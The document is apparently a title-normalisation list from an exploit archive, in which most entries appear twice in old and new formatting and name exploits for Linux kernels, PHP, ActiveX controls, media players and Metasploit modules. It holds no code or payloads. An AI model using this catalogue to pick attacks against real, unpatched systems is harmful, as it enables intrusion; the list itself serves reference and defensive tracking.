PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit

PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit
PHP 4.4.7/5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit

Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation
Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation

Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow
Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow
Adobe Reader - util.printf() JavaScript Function Stack Overflow (1)
Adobe Reader - util.printf() JavaScript Function Stack Overflow (2)
Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (1)
Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)

Microsoft SQL Server - sp_replwritetovarbin() Heap Overflow
Microsoft SQL Server - 'sp_replwritetovarbin()' Heap Overflow

PHP 5.2.8 gd library - imageRotate() Information Leak
PHP 5.2.8 gd library - 'imageRotate()' Information Leak

Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption
Adobe Acrobat Reader 8.1.2 < 9.0 - 'getIcon()' Memory Corruption

PHP - mb_ereg(i)_replace() Evaluate Replacement String
PHP - 'mb_ereg(i)_replace()' Evaluate Replacement String

Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation
Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
FreeBSD 6.1 - kqueue() Null Pointer Dereference Privilege Escalation
Multiple BSD Operating Systems - setusercontext() Vulnerabilities
Avast! 4.8.1335 Professional - Local Kernel Buffer Overflow
FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation
Multiple BSD Operating Systems - 'setusercontext()' Vulnerabilities
Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow

Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation

OtsTurntables 1.00.027 - '.m3u' / '.ofl' Local Universal Buffer Overflow (SEH)
OtsTurntables 1.00.027 - '.m3u' / '.ofl' Universal Local Buffer Overflow (SEH)

Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Privilege Escalation (2)
Linux Kernel 2.4/2.6 (Fedora 11) - 'sock_sendpage()' Privilege Escalation (2)

Millenium MP3 Studio - (pls/mpf/m3u) Local Universal Buffer Overflows (SEH)
Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflows (SEH)

Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Privilege Escalation (3)
Linux Kernel 2.4/2.6 - 'sock_sendpage()' Privilege Escalation (3)

PlayMeNow 7.3 / 7.4 - Malformed '.M3U' Playlist File Buffer
PlayMeNow 7.3/7.4 - Malformed '.M3U' Playlist File Buffer

Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow

PlayMeNow 7.3 / 7.4 - Buffer Overflow (Metasploit)
PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit)

HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow
HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Local Buffer Overflow

(Tod Miller's) Sudo/SudoEdit 1.6.9p21 / 1.7.2p4 - Privilege Escalation
(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Privilege Escalation

PHP 6.0 Dev - str_transliterate() Buffer Overflow
PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow

Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - OpenSession() Buffer Overflow
Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Buffer Overflow

IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow
IP2location.dll 1.0.0.1 - Function 'Initialize()' Buffer Overflow

FreeBSD Kernel - nfs_mount() Exploit
FreeBSD Kernel - 'nfs_mount()' Exploit
MUSE 4.9.0.006 - '.pls' Local Universal Buffer Overflow (SEH)
Triologic Media Player 8 - '.m3u' Local Universal Unicode Buffer Overflow (SEH)
MUSE 4.9.0.006 - '.pls' Universal Local Buffer Overflow (SEH)
Triologic Media Player 8 - '.m3u' Universal Unicode Local Buffer Overflow (SEH)

FreeBSD - mbufs() sendfile Cache Poisoning Privilege Escalation
FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation

Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - CAN BCM Privilege Escalation
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Privilege Escalation

AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)
AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit)

Adobe - Collab.collectEmailInfo() Buffer Overflow (Metasploit)
Adobe - 'Collab.collectEmailInfo()' Buffer Overflow (Metasploit)

NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow
NetOp Remote Control 8.0/9.1/9.2/9.5 - Buffer Overflow

PHP 5.3.5 - socket_connect() Buffer Overflow
PHP 5.3.5 - 'socket_connect()' Buffer Overflow

Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation
Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Privilege Escalation

mount.cifs - chdir() Arbitrary Root File Identification
mount.cifs - 'chdir()' Arbitrary Root File Identification
Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (1)
Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow (2)
Slackware Linux 3.1/3.2 - 'color_xterm' Buffer Overflow (1)
Slackware Linux 3.1/3.2 - color_xterm Buffer Overflow (2)

Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - vsyslog() Buffer Overflow
Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow

Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow
Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow

RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap tgetent() Buffer Overflow (2)
RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (2)

QSSL QNX 4.25 A - crypt() Exploit
QSSL QNX 4.25 A - 'crypt()' Exploit

Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility krb_rd_req() Buffer Overflow (2)
Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Buffer Overflow (2)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2 / 1.3) - (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2 / 1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail) Capabilities Privilege Escalation(1)
Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - (Sendmail 8.10.1) Capabilities Privilege Escalation (2)

X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 _XAsyncReply() Stack Corruption
X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 - libX11 '_XAsyncReply()' Stack Corruption

Linux Kernel 2.2.x - sysctl() Memory Reading (PoC)
Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC)
Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)
Linux Kernel 2.2.18 (RedHat 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)
Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (1)
Linux Kernel 2.2.18 (RedHat 6.2/7.0 / 2.2.14/2.2.18/2.2.18ow4) - ptrace/execve Race Condition Privilege Escalation (2)

Linux Kernel 2.2 / 2.4 - procfs Stream redirection to Process Memory Privilege Escalation
Linux Kernel 2.2/2.4 - procfs Stream redirection to Process Memory Privilege Escalation

Linux Kernel 2.2 / 2.4 - Ptrace/Setuid Exec Privilege Escalation
Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Privilege Escalation

Linux Kernel 2.2.x / 2.3 / 2.4.x - d_path() Path Truncation (PoC)
Linux Kernel 2.2.x/2.3/2.4.x - 'd_path()' Path Truncation (PoC)

Python 1.5.2 Pickle - Unsafe eval() Code Execution
Python 1.5.2 Pickle - Unsafe 'eval()' Code Execution
Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (1)
Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (2)
Linuxconf 1.1.x / 1.2.x - Local Environment Variable Buffer Overflow (3)
Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (1)
Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (2)
Linuxconf 1.1.x/1.2.x - Local Environment Variable Buffer Overflow (3)

ESCPUtil 1.15.2 2 - Local Printer Name Buffer Overflow
ESCPUtil 1.15.2 2 - Printer Name Local Buffer Overflow
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (1)
Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege Escalation (2)
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (1)
Linux Kernel 2.2.x/2.4.x - Privileged Process Hijacking Privilege Escalation (2)

Linux Kernel 2.2.x / 2.4.x - I/O System Call File Existence
Linux Kernel 2.2.x/2.4.x - I/O System Call File Existence

Zblast 1.2 - Local 'Username' Buffer Overrun
Zblast 1.2 - 'Username' Local Buffer Overrun

Linux PAM 0.77 - Pam_Wheel Module getlogin() 'Username' Spoofing Privilege Escalation
Linux PAM 0.77 - Pam_Wheel Module 'getlogin()' 'Username' Spoofing Privilege Escalation

Linux Kernel 2.2.x / 2.4.x - '/proc' Filesystem Potential Information Disclosure
Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Potential Information Disclosure
Tripbit Secure Code Analizer 1.0 - Local fgets() Buffer Overrun
Elm 2.3/2.4 - Local TERM Environment Variable Buffer Overrun
Tripbit Secure Code Analizer 1.0 - 'fgets()' Local Buffer Overrun
Elm 2.3/2.4 - TERM Environment Variable Local Buffer Overrun

GNU AN - Local Command Line Option Buffer Overflow
GNU AN - Command Line Option Local Buffer Overflow
OpenBSD 3.3 - Semget() Integer Overflow (1)
OpenBSD 3.3 - Semget() Integer Overflow (2)
OpenBSD 3.3 - 'Semget()' Integer Overflow (1)
OpenBSD 3.3 - 'Semget()' Integer Overflow (2)

Sendmail 8.12.9 - Prescan() Variant Remote Buffer Overrun
Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun
Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (1)
Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (2)
Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (3)
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (1)
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (2)
Wireless Tools 26 (IWConfig) - ARGV Local Command Line Buffer Overflow (3)

Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read
Linux Kernel 2.5.x/2.6.x - CPUFreq Proc Handler Integer Handling Memory Read

HP-UX 7-11 - Local X Font Server Buffer Overflow
HP-UX 7-11 - X Font Server Local Buffer Overflow

Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)
Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)

Photodex ProShow Gold/Producer 5.0.3310 / 6.0.3410 - ScsiAccess Privilege Escalation
Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - ScsiAccess Privilege Escalation

Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities
Newsgrab 0.5.0pre4 - Local/Remote Multiple Vulnerabilities
Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)
Linux Kernel 2.4.30 / 2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation
Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index Privilege Escalation (1)
Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Privilege Escalation

Ophcrack 3.5.0 - Local Code Execution Buffer Overflow
Ophcrack 3.5.0 - Code Execution Local Buffer Overflow

PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass
PHP 4.x/5.0/5.1 - 'mb_send_mail()' Function Parameter Restriction Bypass

Linux Kernel 2.4.x / 2.5.x / 2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities
Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities

IBM AIX 6.1 / 7.1 - Privilege Escalation
IBM AIX 6.1/7.1 - Privilege Escalation

Nodejs - js-yaml load() Code Exec (Metasploit)
Nodejs - 'js-yaml load()' Code Exec (Metasploit)

PHP 5.2.1 - Session.Save_Path() TMPDIR open_basedir Restriction Bypass
PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass

ELinks Relative 0.10.6 / 011.1 - Path Arbitrary Code Execution
ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution

suPHP 0.7 - 'suPHP_ConfigPath' Safe_Mode() Restriction Bypass Exploit
suPHP 0.7 - 'suPHP_ConfigPath' / 'Safe_Mode()' Restriction Bypass Exploit

Linux Kernel 3.2.0-23 / 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)
Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)

Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution

MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation
MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation

ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)
ImageMagick 6.9.3-9/7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)

Proxifier for Mac 2.17 / 2.18 - Privesc Escalation
Proxifier for Mac 2.17/2.18 - Privesc Escalation

Sendmail 8.12.8 - Prescan() BSD Remote Command Execution
Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution

BFTPd - vsprintf() Format Strings Exploit
BFTPd - 'vsprintf()' Format Strings Exploit

OpenBSD ftpd 2.6 / 2.7 - Remote Exploit
OpenBSD ftpd 2.6/2.7 - Remote Exploit
Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit
Rlpr 2.04 - msg() Remote Format String
Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Exploit
Rlpr 2.04 - 'msg()' Remote Format String

Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String
Courier-IMAP 3.0.2-r1 - 'auth_debug()' Remote Format String

PHP 4.3.7 - openlog() Buffer Overflow
PHP 4.3.7 - 'openlog()' Buffer Overflow

Apple iTunes - Playlist Local Parsing Buffer Overflow
Apple iTunes - Playlist Parsing Local Buffer Overflow

Newspost 2.1 - socket_getline() Remote Buffer Overflow (2)
Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)

CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)
CA Unicenter 3.1 - CAM 'log_security()' Stack Overflow (Metasploit)

sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String
sobexsrv 1.0.0_pre3 Bluetooth - 'syslog()' Remote Format String

Mozilla Firefox 1.04 - compareTo() Remote Code Execution
Mozilla Firefox 1.04 - 'compareTo()' Remote Code Execution
Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit)
Mozilla Firefox 1.5 (OSX) - location.QueryInterface() Code Execution (Metasploit)
Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)
Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)

crossfire-server 1.9.0 - SetUp() Remote Buffer Overflow
crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow
MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit
Quake 3 Engine 1.32b - R_RemapShader() Remote Client Buffer Overflow
MySQL 4.1.18/5.0.20 - Local/Remote Information Leakage Exploit
Quake 3 Engine 1.32b - 'R_RemapShader()' Remote Client Buffer Overflow

iShopCart - vGetPost() Remote Buffer Overflow (cgi)
iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI)

Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - 'FTP' Remote Exploit
Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote Exploit
XMPlay 3.3.0.4 - (PLS) Local+Remote Buffer Overflow
Oracle 9i / 10g - (read/write/execute) Exploitation Suite
XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow
Oracle 9i/10g - (read/write/execute) Exploitation Suite
Oracle 9i / 10g (extproc) - Local / Remote Command Execution
Oracle 9i / 10g - 'utl_file' FileSystem Access Exploit
Oracle 9i/10g - 'extproc' Local/Remote Command Execution
Oracle 9i/10g - 'utl_file' FileSystem Access Exploit

Portable OpenSSH 3.6.1p-PAM / 4.1-SuSE - Timing Attack Exploit
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack Exploit

PHP 4.4.3 < 4.4.6 - PHPinfo() Cross-Site Scripting
PHP 4.4.3 < 4.4.6 - 'PHPinfo()' Cross-Site Scripting

XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow
XAMPP for Windows 1.6.0a - 'mssql_connect()' Remote Buffer Overflow

IPIX Image Well ActiveX - 'iPIX-ImageWell-ipix.dll' Buffer Overflow
IPIX Image Well - ActiveX 'iPIX-ImageWell-ipix.dll' Buffer Overflow

Zenturi ProgramChecker ActiveX - 'sasatl.dll' Remote Buffer Overflow
Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow

Zenturi ProgramChecker - ActiveX NavigateUrl() Insecure Method Exploit
Zenturi ProgramChecker - 'ActiveX NavigateUrl()' Insecure Method Exploit

NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method
NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()/ Insecure Method

HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - SaveToFile() Exploit
HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' Exploit

NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow
NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow

Versalsoft HTTP File Uploader - AddFile() Remote Buffer Overflow
Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow

Data Dynamics ActiveReport ActiveX - 'actrpt2.dll 2.5' Insecure Method
Data Dynamics ActiveReport - ActiveX 'actrpt2.dll 2.5' Insecure Method
Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow
CHILKAT ASP String - 'CkString.dll 1.1' SaveToFile() Insecure Method
Yahoo! Widget < 4.0.5 - 'GetComponentVersion()' Remote Overflow
CHILKAT ASP String - 'CkString.dll 1.1' 'SaveToFile()' Insecure Method
NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - SetText() Remote Exploit
NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - SaveXMLFile() Insecure Method
NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - DeleteXMLFile() Insecure Method
NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Remote Exploit
NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method
NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'DeleteXMLFile()' Insecure Method

Microsoft MSN Messenger 7.x (8.0?) - Video Remote Heap Overflow
Microsoft MSN Messenger 7.x/8.0? - Video Remote Heap Overflow

GlobalLink 2.7.0.8 - 'glItemCom.dll' SetInfo() Heap Overflow
GlobalLink 2.7.0.8 - 'glItemCom.dll' 'SetInfo()' Heap Overflow
GlobalLink 2.7.0.8 - 'glitemflat.dll' SetClientInfo() Heap Overflow
Ultra Crypto Component - 'CryptoX.dll 2.0' SaveToFile() Insecure Method
GlobalLink 2.7.0.8 - 'glitemflat.dll' 'SetClientInfo()' Heap Overflow
Ultra Crypto Component - 'CryptoX.dll 2.0' 'SaveToFile()' Insecure Method

jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution
jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution

Persits Software XUpload Control - AddFolder() Buffer Overflow
Persits Software XUpload Control - 'AddFolder()' Buffer Overflow

idautomation bar code ActiveX - Multiple Vulnerabilities
idautomation bar code - ActiveX Multiple Vulnerabilities

C6 Messenger ActiveX - Remote Download and Execute Exploit
C6 Messenger - ActiveX Remote Download and Execute Exploit

NuMedia Soft Nms DVD Burning SDK ActiveX - 'NMSDVDX.dll' Exploit
NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Exploit

GdPicture Pro ActiveX - 'gdpicture4s.ocx' File Overwrite / Exec Exploit
GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec Exploit
MW6 Aztec ActiveX - 'Aztec.dll' Remote Insecure Method Exploit
MW6 Barcode ActiveX - 'Barcode.dll' Insecure Method Exploit
MW6 Aztec - ActiveX 'Aztec.dll' Remote Insecure Method Exploit
MW6 Barcode - ActiveX 'Barcode.dll' Insecure Method Exploit

GE Fanuc Real Time Information Portal 2.6 - writeFile() API Exploit (Metasploit)
GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit)

EasyMail ActiveX - 'emmailstore.dll 6.5.0.3' Buffer Overflow
EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Buffer Overflow

Megacubo 5.0.7 - (mega://) Remote eval() Injection
Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection

Word Viewer OCX 3.2 ActiveX - (Save) Remote File Overwrite
Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite

EDraw Office Viewer 5.4 - HttpDownloadFile() Insecure Method
EDraw Office Viewer 5.4 - 'HttpDownloadFile()' Insecure Method

Oracle Secure Backup 10g - exec_qr() Command Injection
Oracle Secure Backup 10g - 'exec_qr()' Command Injection

Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit
Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit
Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution
Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution
BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow
Adobe Reader 8.1.4/9.1 - 'GetAnnots()' Remote Code Execution
Adobe 8.1.4/9.1 - 'customDictionaryOpen()' Code Execution
BaoFeng - ActiveX 'OnBeforeVideoDownload()' Remote Buffer Overflow

AOL IWinAmpActiveX Class ConvertFile() - Remote Buffer Overflow
AOL IWinAmpActiveX Class - 'ConvertFile()' Remote Buffer Overflow

Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities
Virtualmin < 3.703 - Local/Remote Multiple Vulnerabilities

Quiksoft EasyMail 6.0.3.0 - imap connect() ActiveX Buffer Overflow
Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow

EnjoySAP 6.4 / 7.1 - File Overwrite
EnjoySAP 6.4/7.1 - File Overwrite

Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection
Blender 2.34/2.35a/2.4/2.49b - '.blend' Command Injection

Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)
Solaris 10/11 Telnet - Remote Authentication Bypass (Metasploit)

mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)
mDNSResponder 10.4.0/10.4.8 (OSX) - UPnP Location Overflow (Metasploit)

Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit)
Opera 9.50/9.61 historysearch - Command Execution (Metasploit)
Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)
PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)
Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit)
PoPToP < 1.1.3-b3/1.1.3-20030409 - Negative Read Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit)
Borland Interbase 2007/2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit)
Borland Interbase 2007/2007 SP2 - 'jrd8_create_database' Buffer Overflow (Metasploit)
Borland Interbase 2007/2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit)

HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit)
HP-UX LPD 10.20/11.00/11.11 - Command Execution (Metasploit)

PHP 5.3 - preg_match() Full Path Disclosure
PHP 5.3 - 'preg_match()' Full Path Disclosure

Trend Micro Web-Deployment ActiveX - Remote Execution (PoC)
Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)

Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow
Liquid XML Studio 2010 < 8.061970 - 'LtXmlComHelp8.dll' 'OpenFile()' Remote Overflow

Bigant Messenger 2.52 - 'AntCore.dll' RegisterCom() Remote Heap Overflow
Bigant Messenger 2.52 - 'AntCore.dll' 'RegisterCom()' Remote Heap Overflow

Apple Safari 4.0.5 - parent.close() (memory Corruption) Code Execution
Apple Safari 4.0.5 - 'parent.close()' Memory Corruption Code Execution

Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass)
Apple Safari 4.0.5 - 'parent.close()' Memory Corruption (ASLR + DEP Bypass)

ComponentOne VSFlexGrid 7 / 8 - 'Archive()' method Remote Buffer Overflow
ComponentOne VSFlexGrid 7/8 - 'Archive()' method Remote Buffer Overflow

Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow
Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Buffer Overflow

Nginx 0.7.65 / 0.8.39 (dev) - Source Disclosure / Download
Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download

SigPlus Pro 3.74 - ActiveX LCDWriteString() Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)
SigPlus Pro 3.74 - ActiveX 'LCDWriteString()' Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)

McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution)
McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution

Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (2)
Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2)

Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (Metasploit)

Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit)
Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Buffer Overflow (Metasploit)

Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow
Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Buffer Overflow

Microsoft WMITools ActiveX - Remote Command Execution
Microsoft WMITools - ActiveX Remote Command Execution

